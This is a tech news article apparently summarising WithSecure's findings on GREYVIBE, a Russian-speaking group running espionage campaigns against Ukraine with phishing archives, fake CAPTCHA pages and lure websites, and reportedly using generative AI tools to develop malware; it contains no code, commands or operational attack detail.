A newly identified cyber threat group known as GREYVIBE has been linked to an ongoing cyber espionage campaign targeting Ukraine and organizations connected to the country since at least August 2025. According to cybersecurity company WithSecure, the threat actor is believed to be a Russian speaking group operating broadly within the Russian time zone. Researchers assess that the activity aligns with Kremlin state interests, particularly intelligence gathering efforts associated with the ongoing Russia Ukraine conflict. The campaign has reportedly targeted a broad range of victims, including military institutions, government bodies, civilian networks, and business organizations, signaling a wide operational scope.
WithSecure researchers revealed that GREYVIBE has relied on several attack methods to infiltrate systems and deliver malware. These methods include spear phishing emails, fake CAPTCHA pages, and deceptive Ukrainian themed adult club websites designed to lure victims into downloading malicious software. One of the key attack chains, known as PhantomMail, distributes harmful ZIP and RAR files hosted on cloud platforms such as Google Drive and 4sync through phishing emails. Once downloaded, these archives launch JavaScript based loaders that open decoy documents while secretly deploying PhantomRelay, a PowerShell based remote access trojan capable of profiling infected systems and executing commands. Another technique, called PhantomClick, uses fake CAPTCHA pages hosted on domains disguised as legitimate services such as Zoom and LAPAS to manipulate users into manually running commands that trigger malware infections.
The group has also used more deceptive social engineering tactics under operations identified as PrincessClub, DroneLink, and Nebo. PrincessClub reportedly involved fraudulent Ukrainian adult club websites that distributed Android spyware known as FallSpy and Windows malware variants including PhantomRelayV1 and LegionRelay. Updated versions of these fake websites also featured WebRTC based live call functionality designed to capture victims’ audio and video. Researchers said FallSpy can extract sensitive information from compromised Android devices, while LegionRelay is capable of file theft, screenshot capture, browser credential harvesting, messaging app data extraction from Telegram and WhatsApp, and setting up remote desktop access. DroneLink reportedly used websites impersonating charitable organizations supporting Armed Forces of Ukraine to deploy LegionRelay and WireGuard tools. Nebo, another operation linked to GREYVIBE, used a FallSpy sample disguised as a Russian language login interface, likely intended to deceive Ukrainian military personnel.
Researchers also identified evidence suggesting GREYVIBE has incorporated generative artificial intelligence and large language models into its operations. Platforms such as Ideogram AI, OpenAI ChatGPT, and Google Gemini were reportedly used to create images, assist malware development, generate obfuscation techniques, support backend infrastructure, and automate post compromise commands. According to WithSecure, this use of AI may have enabled the group to compensate for technical limitations, accelerate malware development, and reduce dependency on previously identified tools that could reveal attribution patterns. However, researchers noted that AI generated coding flaws in LegionRelay also exposed portions of the malware’s backend functionality, indicating operational mistakes uncommon among highly sophisticated state backed groups.
WithSecure further stated that GREYVIBE appears to maintain links with the wider Russian cybercrime ecosystem. Researchers highlighted the suspected use of an ISO builder associated with TrickBot linked activity and UAC 0098, alongside malware overlaps found in separate cybercrime campaigns between 2025 and 2026. Additional indicators included the upload of early malware samples to VirusTotal, the use of internet slang in development naming conventions, and the limited deployment of XMRig cryptocurrency mining software on compromised systems. While the exact relationship between GREYVIBE and Russian state structures remains uncertain, researchers assess that the group operates in a space between cybercrime and state affiliated activity, making attribution increasingly difficult.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
